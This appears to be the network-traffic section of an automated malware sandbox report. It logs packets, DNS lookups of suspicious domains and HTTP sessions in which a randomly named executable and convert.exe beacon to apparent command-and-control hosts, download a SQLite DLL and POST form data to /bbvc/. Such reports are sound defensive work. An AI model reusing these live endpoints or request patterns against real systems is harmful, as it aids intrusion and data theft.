                                                                                                Nov 11, 2024 10:04:50.445712090 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:50.445871115 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:51.484778881 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:51.489694118 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:52.501843929 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.506962061 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:52.507144928 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.514759064 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.519643068 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286149025 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286170006 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286184072 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286314964 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286390066 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.320908070 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.321027994 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.321995974 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.326818943 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.702528954 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.707581043 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.707724094 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.721899986 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.726890087 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.726902962 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.727087975 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.731983900 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.499281883 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.705775976 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:59.792213917 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.792229891 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.792359114 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:00.220662117 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.237656116 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.242718935 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:01.242888927 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.254463911 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.259361029 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306224108 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306447029 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306459904 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306515932 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:02.309668064 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:02.768731117 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.782146931 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.787620068 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.787720919 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.799254894 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.804483891 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.804501057 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.804693937 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.809737921 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.809772015 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.599663973 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.797142982 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.797267914 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:05.306787014 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.329006910 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.334711075 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:06.334779024 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.342705011 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.347599983 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.134526968 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.323452950 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.323643923 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:07.324516058 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:07.329396009 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.389244080 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.394150019 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.394274950 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.416843891 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.421821117 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.421905994 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.421936989 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.426733017 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.951385021 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:13.019412041 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:13.019495964 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:13.917757034 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.972870111 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.977912903 CET8049173209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:14.978013992 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.989640951 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.994549990 CET8049173209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:15.531544924 CET8049173209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:15.599549055 CET8049173209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:15.599710941 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:16.491569042 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:17.509727955 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:17.514715910 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:17.514807940 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:17.531440020 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:17.536520004 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:17.536545992 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:17.536581993 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:17.541438103 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:17.541513920 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:18.071110010 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:18.139420986 CET8049174209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:18.139509916 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:19.036317110 CET4917480192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:20.052711964 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:20.057807922 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:20.057898998 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:20.068116903 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:20.073070049 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:20.660856009 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:20.875113010 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:20.876156092 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:20.876225948 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:21.045557976 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:21.045855999 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:21.047164917 CET4917580192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:21.052124977 CET8049175209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:22.374917984 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:05:22.380181074 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:05:22.380264044 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:05:26.071981907 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:26.076868057 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.077254057 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:26.088202953 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:26.093235016 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.093281031 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.093313932 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:26.098126888 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.511251926 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.513823032 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:27.901865959 CET4917680192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:28.071654081 CET804917615.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:28.912038088 CET4917780192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:28.917032957 CET804917715.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:28.917130947 CET4917780192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:28.929763079 CET4917780192.168.2.2215.197.148.33
                                                                                                Nov 11, 2024 10:05:28.934798002 CET804917715.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:29.352650881 CET804917715.197.148.33192.168.2.22
                                                                                                Nov 11, 2024 10:05:29.352715015 CET4917780192.168.2.2215.197.148.33

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 11, 2024 10:03:21.499429941 CET5456253192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:03:21.506927013 CET53545628.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:03:21.514652014 CET5291753192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:03:21.521640062 CET53529178.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:04:28.664933920 CET6275153192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:04:28.674019098 CET53627518.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.464392900 CET5789353192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:04:34.474073887 CET53578938.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.722887039 CET5482153192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:04:44.839288950 CET53548218.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.322182894 CET5471953192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:04:58.699074030 CET53547198.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.348911047 CET4988153192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:05:12.382644892 CET53498818.8.8.8192.168.2.22
                                                                                                Nov 11, 2024 10:05:26.058958054 CET5499853192.168.2.228.8.8.8
                                                                                                Nov 11, 2024 10:05:26.069634914 CET53549988.8.8.8192.168.2.22

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 11, 2024 10:03:21.499429941 CET192.168.2.228.8.8.80x987aStandard query (0)www.diced.jpA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:03:21.514652014 CET192.168.2.228.8.8.80xadc6Standard query (0)www.diced.jpA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:28.664933920 CET192.168.2.228.8.8.80x5191Standard query (0)www.d63dm.topA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:34.464392900 CET192.168.2.228.8.8.80x3338Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:44.722887039 CET192.168.2.228.8.8.80xbddfStandard query (0)www.danceonwater.netA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:58.322182894 CET192.168.2.228.8.8.80x5804Standard query (0)www.foshape.topA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:12.348911047 CET192.168.2.228.8.8.80x8e9aStandard query (0)www.swiftbyrte.xyzA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:26.058958054 CET192.168.2.228.8.8.80x93f4Standard query (0)www.maryneedskidneys.infoA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 11, 2024 10:03:21.506927013 CET8.8.8.8192.168.2.220x987aNo error (0)www.diced.jpdiced.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 10:03:21.506927013 CET8.8.8.8192.168.2.220x987aNo error (0)diced.jp153.121.40.91A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:03:21.521640062 CET8.8.8.8192.168.2.220xadc6No error (0)www.diced.jpdiced.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 10:03:21.521640062 CET8.8.8.8192.168.2.220xadc6No error (0)diced.jp153.121.40.91A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:28.674019098 CET8.8.8.8192.168.2.220x5191No error (0)www.d63dm.topd63dm.topCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:28.674019098 CET8.8.8.8192.168.2.220x5191No error (0)d63dm.top154.23.184.218A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:34.474073887 CET8.8.8.8192.168.2.220x3338No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:44.839288950 CET8.8.8.8192.168.2.220xbddfNo error (0)www.danceonwater.net208.91.197.27A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:04:58.699074030 CET8.8.8.8192.168.2.220x5804No error (0)www.foshape.top206.238.184.166A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:12.382644892 CET8.8.8.8192.168.2.220x8e9aNo error (0)www.swiftbyrte.xyz209.74.64.59A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:26.069634914 CET8.8.8.8192.168.2.220x93f4No error (0)www.maryneedskidneys.infomaryneedskidneys.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:26.069634914 CET8.8.8.8192.168.2.220x93f4No error (0)maryneedskidneys.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 10:05:26.069634914 CET8.8.8.8192.168.2.220x93f4No error (0)maryneedskidneys.info3.33.130.190A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • www.diced.jp
                                                                                                • www.d63dm.top
                                                                                                • www.sqlite.org
                                                                                                • www.danceonwater.net
                                                                                                • www.foshape.top
                                                                                                • www.swiftbyrte.xyz
                                                                                                • www.maryneedskidneys.info

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.2249162154.23.184.218802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:28.693653107 CET405OUTGET /5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIX HTTP/1.1
                                                                                                Host: www.d63dm.top
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:04:29.496959925 CET302INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:04:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 138
                                                                                                Connection: close
                                                                                                ETag: "669137aa-8a"
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.224916345.33.6.223803704C:\Windows\SysWOW64\convert.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:34.490911961 CET266OUTGET /2018/sqlite-dll-win32-x86-3250000.zip HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Host: www.sqlite.org
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                Nov 11, 2024 10:04:34.973723888 CET249INHTTP/1.1 200 OK
                                                                                                Connection: keep-alive
                                                                                                Date: Mon, 11 Nov 2024 09:04:34 GMT
                                                                                                Last-Modified: Tue, 18 Sep 2018 20:35:16 GMT
                                                                                                Cache-Control: max-age=120
                                                                                                ETag: "m5ba16184s74420"
                                                                                                Content-type: application/zip; charset=utf-8
                                                                                                Content-length: 476192
                                                                                                Nov 11, 2024 10:04:34.973752975 CET1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 d1 a4 2f 4d 8e f8 a0 df 28 05 00 00 a1 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 5a 0b 9d 5b 5a 0b 9d 5b 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 72 dc 36 0c 80 ef 79 9b c4 1d
                                                                                                Data Ascii: PK/M(sqlite3.defUTZ[Z[uxdr6yO_ fzP"x~?HnzA$A~KI/w0-F{CMo&|F?,pN]Z;!p[pV&:=yYg[@N89xO%JLo3x8Xx
                                                                                                Nov 11, 2024 10:04:34.973773003 CET1236INData Raw: 5b 70 33 65 f5 b6 a2 ee 96 5d b5 a5 b8 bb 3e 3f 68 73 31 6d 56 06 2c ec d2 31 23 11 06 dd e3 b6 8d 7a ef ca 56 9c 18 06 43 5d c1 6c b6 49 ac 77 68 a4 46 a7 87 95 5c aa 3f ae 22 ff 8e 92 ba db e4 55 a6 fa 5f 4c a3 3c 6a 58 20 e3 e8 f6 f2 6d 92 6e
                                                                                                Data Ascii: [p3e]>?hs1mV,1#zVC]lIwhF\?"U_L<jX mn;a*MoFvO9Xq*Y<U:zP,`dQ7k6$/PK/M{K=|sqlite3.dllUTZ[Z[uxd}|T89I&a0
                                                                                                Nov 11, 2024 10:04:34.973789930 CET1236INData Raw: c4 1b 4c d8 1b 7b df b9 62 18 2f 2b fe 30 40 98 5f fd 4f a8 2d d4 3b 16 0e 47 66 e5 1d 4c 38 89 09 50 86 d7 cb 98 e0 47 dd ce da 85 05 71 5c 42 8d 63 51 fd f5 df 47 0e af 29 24 8d a4 5d ee 4d ac 6c 23 b3 aa b6 85 8a a5 2d 06 e2 88 85 ea 2f 07 a0
                                                                                                Data Ascii: L{b/+0@_O-;GfL8PGq\BcQG)$]Ml#-/`G&Qb<jnd|N|pa4`-?0E7 xu!xQeaK_PE}*t<Io^sXA'fyZm<?)qPq2@+'tMzHf[Q
                                                                                                Nov 11, 2024 10:04:34.973814964 CET636INData Raw: 7e d5 20 f7 71 f2 19 8e eb 23 45 ad dc 31 2c 38 5d a8 99 3d f0 2c 0e 3c 47 5a c5 04 8b d4 9b 21 f5 6c 3c a7 2d 0a 8e dc 2c d9 e0 b5 c9 a7 62 25 da 0c 1a e8 cd 5c 08 6f 8c 3f 39 ee 12 72 2e 90 c1 8c 40 cf c6 a9 da 2c 32 68 a4 6b 09 c1 ef a5 49 31
                                                                                                Data Ascii: ~ q#E1,8]=,<GZ!l<-,b%\o?9r.@,2hkI1@CGI-N%EQCn]{UEl8@;>Bistr[nt<m9,Ti8pr&NL'h~J^.b!0/k+@IBtp5
                                                                                                Nov 11, 2024 10:04:34.973825932 CET1236INData Raw: 48 91 4a a4 de b2 1b 10 f6 f6 55 e5 b1 38 15 9b 97 c1 b4 2d 94 54 36 6b 57 05 7a dd c3 e5 f9 db ef 70 5f d0 d2 30 d7 96 45 8c 44 e1 77 9c 4c f8 4e a4 6e 72 8c 04 7a e4 46 8e 1c 96 8f 9b dc 81 9e f2 c4 ed 31 6e a9 bb 74 16 2d 52 11 4b da a7 1f 22
                                                                                                Data Ascii: HJU8-T6kWzp_0EDwLNnrzF1nt-RK"JgZL''DV EX#m({;$Z@<%vz/n3ld^+/yMvH#0q%sn4!^ *vT)KJNU,+xg7
                                                                                                Nov 11, 2024 10:04:34.973843098 CET212INData Raw: 75 40 d6 60 99 24 90 76 72 80 f5 aa 89 ac b4 6a 53 e1 0f 5d 67 c5 a5 49 b2 ad c0 4f e5 fd 89 e3 7a 31 22 e2 21 d4 35 3d b8 fc ec 4a fe 45 f5 cb 30 72 c3 8b 40 7d 80 74 ce a3 5e 04 69 53 0a ad e4 bc 7a 00 3e 41 e2 7c 03 27 29 ae fe 7c 79 84 db 71
                                                                                                Data Ascii: u@`$vrjS]gIOz1"!5=JE0r@}t^iSz>A|')|yq;k1F.%U[R]j%@PP&KlJMYl4eAo#d[X`m)`%"-|B6H.b^+hG,r,mIJ`l&
                                                                                                Nov 11, 2024 10:04:34.974466085 CET1236INData Raw: 49 c1 6d d3 63 c4 78 72 a1 aa 70 ba 66 46 a9 21 71 92 c1 21 91 ae 5d 41 f3 f2 c8 89 f8 03 40 35 de 7f 19 29 58 58 ae 0b cb ed 61 d0 ff c8 f6 64 1b 33 42 89 c9 56 75 63 2f 2c dd 5a 0e 44 51 72 44 f8 c3 a1 c1 b3 a0 93 31 c5 30 0a 26 10 8d 60 99 0d
                                                                                                Data Ascii: ImcxrpfF!q!]A@5)XXad3BVuc/,ZDQrD10&`$LA\4SwP{&~Jh&dbT!bxpp IMhHYr2Jq,N1&y&f_U"p-C]4pX73eS4HI24:|
                                                                                                Nov 11, 2024 10:04:34.974478006 CET1236INData Raw: 3e 01 ab 4a 9c 87 4b af 90 5f 46 bc 79 7f 32 bd ff 28 68 88 64 f9 62 b2 29 bd ca 1b 0f 02 d7 38 07 04 82 77 0c 09 13 48 fa f9 47 95 fc 1e 58 e1 34 4e 6d 1e 46 92 03 9a f5 74 54 9e 2f 90 61 f5 4d e4 de fe a3 c4 0c f4 03 cb 47 34 51 31 1e 98 4c 5e
                                                                                                Data Ascii: >JK_Fy2(hdb)8wHGX4NmFtT/aMG4Q1L^aCddyX'{_Ha@9kQ/?rxpSm>,6q>vxU}Xu7:2t$ao^Nans+vr]VU#m_,+!y4O$bY#FsAa
                                                                                                Nov 11, 2024 10:04:34.974489927 CET1236INData Raw: 2a 6f b5 9b 8c b6 e9 4b f9 18 f9 14 44 7a e4 ac a0 56 ad 98 2c da 53 0b f1 b7 02 df 05 41 de a1 00 81 cc 49 b6 d3 58 66 f2 c9 4c 46 73 8f 92 8b 69 d6 f0 7d 49 95 b5 20 be 53 7f 6b f9 2c 72 2b cd e5 95 35 3c 8c 0d 4f 1a b5 4f c8 83 3c 20 2b 68 e5
                                                                                                Data Ascii: *oKDzV,SAIXfLFsi}I Sk,r+5<OO< +hRpgq!ZebU!S`oxUNS'virDjoTqvhIZ#M"s+4)9$U/\'/+= &QO@/zc0s6e[HI%,>>nN_M
                                                                                                Nov 11, 2024 10:04:34.981012106 CET1236INData Raw: ce f8 e6 b1 c9 b5 56 35 c0 88 b9 78 46 4b 83 6e ec f9 09 10 0c 75 1d 2b 20 5d 4d 31 93 5d 67 83 bc ba 99 a5 02 91 7b 1d f2 88 cf 21 d9 b7 47 99 4f 80 3d c1 74 58 a1 4d 19 a5 d8 a2 7e b9 5f 6f d1 a9 ba 2f 78 cb 43 e8 42 33 9b 02 f7 c0 89 19 fe cc
                                                                                                Data Ascii: V5xFKnu+ ]M1]g{!GO=tXM~_o/xCB3lT+z ]u_%uG[h>q|sar,oy^y,na2S_u5;%n=)6KO9ZY/S{EP&&33


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.2249164208.91.197.27802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:44.857294083 CET2472OUTPOST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
